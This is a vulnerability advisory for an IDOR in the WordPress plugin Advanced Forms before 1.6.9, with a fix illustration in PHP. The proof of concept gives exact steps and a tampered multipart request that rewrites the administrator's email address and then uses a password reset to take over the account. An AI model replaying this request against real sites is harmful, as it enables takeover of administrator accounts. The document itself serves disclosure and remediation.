WordPress Plugin Vulnerabilities
Advanced Forms < 1.6.9 - Subscriber+ Arbitrary User Email Address Update via IDOR
Description
An Insecure Direct Object Reference in the edit function of Advanced Forms (Free & Pro) before 1.6.9 allows an authenticated remote attacker to change an arbitrary user's email address and then request a password reset, which could lead to takeover of the WordPress administrator account. To exploit this vulnerability, an attacker must register to obtain a valid WordPress user account and authenticate with it in order to reach the vulnerable edit function.
Proof of Concept
- Access the target site and log in as a normal user (userID 209) to use the "edit user's information" function.
- After decoding the "af_form_args" and "_acf_form" parameters from base64, the data is JSON: {"display_title":false,"display_description":false,"id":"form_5d37f4523b775","values":[],"submit_text":"Submit","redirect":"https:\/\/victim.com\/","target":"https:\/\/victim.com\/","echo":true,"exclude_fields":[],"uploader":"wp","filter_mode":false,"label_placement":"top","instruction_placement":"label","honeypot":true,"user":209} This JSON contains a "user" field, which is the WordPress user ID.
- The doer can change it to another userID (such as 1, which by default is the WordPress administrator account): {"display_title":false,"display_description":false,"id":"form_5d37f4523b775","values":[],"submit_text":"Submit","redirect":"https:\/\/victim.com\/","target":"https:\/\/victim.com\/","echo":true,"exclude_fields":[],"uploader":"wp","filter_mode":false,"label_placement":"top","instruction_placement":"label","honeypot":true,"user":1}
- Encode it back as base64 and modify the "af_form_args" and "_acf_form" parameters in an intercepting proxy before sending the request, so that the other user's information is edited. In the worst case, if the target site allows editing a user's email address, the doer can take over that user's account by changing the email and requesting a password reset.
POST /account/edit HTTP/1.1
-----------------------------299397949318395902213847433917
Content-Disposition: form-data; name="af_form_args"

eyJkaXNwbGF5X3RpdGxlIjpmYWxzZSwiZGlzcGxheV9kZXNjcmlwdGlvbiI6ZmFsc2UsImlkIjoiZm9ybV81ZDM3ZjQ1MjNiNzc1IiwidmFsdWVzIjpbXSwic3VibWl0X3RleHQiOiJTdWJtaXQiLCJyZWRpcmVjdCI6Imh0dHBzOlwvXC92aWN0aW0uY29tXC8iLCJ0YXJnZXQiOiJodHRwczpcL1wvdmljdGltLmNvbVwvIiwiZWNobyI6dHJ1ZSwiZXhjbHVkZV9maWVsZHMiOltdLCJ1cGxvYWRlciI6IndwIiwiZmlsdGVyX21vZGUiOmZhbHNlLCJsYWJlbF9wbGFjZW1lbnQiOiJ0b3AiLCJpbnN0cnVjdGlvbl9wbGFjZW1lbnQiOiJsYWJlbCIsImhvbmV5cG90Ijp0cnVlLCJ1c2VyIjoxfQ==
-----------------------------299397949318395902213847433917
Content-Disposition: form-data; name="_acf_form"

eyJkaXNwbGF5X3RpdGxlIjpmYWxzZSwiZGlzcGxheV9kZXNjcmlwdGlvbiI6ZmFsc2UsImlkIjoiZm9ybV81ZDM3ZjQ1MjNiNzc1IiwidmFsdWVzIjpbXSwic3VibWl0X3RleHQiOiJTdWJtaXQiLCJyZWRpcmVjdCI6Imh0dHBzOlwvXC92aWN0aW0uY29tXC8iLCJ0YXJnZXQiOiJodHRwczpcL1wvdmljdGltLmNvbVwvIiwiZWNobyI6dHJ1ZSwiZXhjbHVkZV9maWVsZHMiOltdLCJ1cGxvYWRlciI6IndwIiwiZmlsdGVyX21vZGUiOmZhbHNlLCJsYWJlbF9wbGFjZW1lbnQiOiJ0b3AiLCJpbnN0cnVjdGlvbl9wbGFjZW1lbnQiOiJsYWJlbCIsImhvbmV5cG90Ijp0cnVlLCJ1c2VyIjoxfQ==
-----------------------------299397949318395902213847433917
Content-Disposition: form-data; name="acf[field_abcd]"
#### for example acf[field_abcd] is for edit email address ####

[email protected]

- When a password reset is then requested, WordPress sends the URL for setting a new password to [email protected], leading to takeover of the WordPress administrator account.
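The root cause above is that the server trusts the "user" value inside the client-supplied, base64-encoded af_form_args blob. The following is an added illustration, not the plugin's own code: the vulnerable pattern beside a server-side ownership check built on WordPress core functions (get_current_user_id, current_user_can). The function names are hypothetical.

```php
<?php
// Added illustration (not Advanced Forms code): resolving which user a
// profile-edit request may modify. Assumes WordPress core is loaded.

/**
 * Vulnerable pattern: the target user ID is taken straight from the
 * client-controlled af_form_args blob. Any logged-in user can set
 * "user" to 1 and edit the administrator's profile (the IDOR above).
 */
function example_vulnerable_target_user(): int {
    $args = json_decode( base64_decode( $_POST['af_form_args'] ?? '' ), true );
    return (int) ( $args['user'] ?? 0 );
}

/**
 * Hardened pattern: the client value is at most a hint. The server derives
 * the editable account from the authenticated session and only allows a
 * different target when the caller holds the edit_user meta capability
 * for that specific user ID. Returns 0 when the request must be rejected.
 */
function example_authorized_target_user(): int {
    $current = get_current_user_id();
    if ( 0 === $current ) {
        return 0; // anonymous request: nothing may be edited
    }

    // Strict base64 decoding and a type check reject malformed blobs
    // instead of silently treating them as "user 0".
    $raw  = base64_decode( $_POST['af_form_args'] ?? '', true );
    $args = ( false !== $raw ) ? json_decode( $raw, true ) : null;
    if ( ! is_array( $args ) ) {
        return 0;
    }

    // Default to the caller's own account if no user was supplied.
    $requested = (int) ( $args['user'] ?? $current );

    // Self-edit is always permitted; editing anyone else is an explicit
    // capability decision made by WordPress, never by the form data.
    if ( $requested !== $current && ! current_user_can( 'edit_user', $requested ) ) {
        return 0;
    }

    return $requested;
}
```

If the form is only ever meant to edit the caller's own profile, the simplest fix is to ignore the "user" field entirely and always use get_current_user_id(); email changes additionally deserve re-authentication or a confirmation link to the old address, since the reset flow shown above turns an email change into an account takeover.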
Affects Plugins
References
Classification
Type
IDOR
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Suppawit Punhakit
Submitter
Suppawit Punhakit
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2020-06-27
Added
2021-10-21
Last Updated
2022-04-11